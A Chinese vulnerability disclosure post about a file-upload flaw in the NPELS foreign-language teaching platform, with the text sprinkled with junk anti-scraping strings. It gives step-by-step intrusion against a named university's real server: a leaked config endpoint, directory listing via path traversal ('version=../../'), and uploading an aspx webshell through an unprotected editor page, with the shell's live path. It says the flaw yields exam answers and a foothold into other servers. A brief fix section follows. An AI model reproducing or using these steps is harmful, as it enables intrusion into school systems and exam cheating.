新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
5 a1 Q3 l. f" ~2 i/ B
详细说明：
& v, n6 P. o" t. ^* B' b1 M# |; J/ y
. A2 E. _# B) k" [以南开大学的为例:
http://222.30.60.3/NPELS
2 W* y7 g' n6 c; s" B& ~7 A7 DNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
' F0 g4 S# O+ e4 ^6 l9 W3 \2 C, i</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
' }- N& x! q1 ~http://222.30.60.3/NPELS/CommonService.asmx
0 G) b5 c6 N) u6 j  o0 _8 \使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
# i! C  G9 W+ Q3 h6 Z% Uhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
, M' ^4 \3 o- s8 X  N. bhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
6 ]( N6 v7 v* j- b! Q  b上传后继续列目录找到木马地址直接访问即可
& n3 ^- C& ^/ A0 T) r
OOXX

3 m! R! ]$ j7 [- Z6 _Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
0 A/ D7 E" J) l/ C1 _# u! F$ V
) P2 |' b6 t: }; B8 d列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

4 x! g! e! b. t+ H# F' m上传木马：
$ i) D* a' c' ^& qhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

  ?* J$ f, @4 p& D# a修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
; L7 F% @- `* S5 |& I, X并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​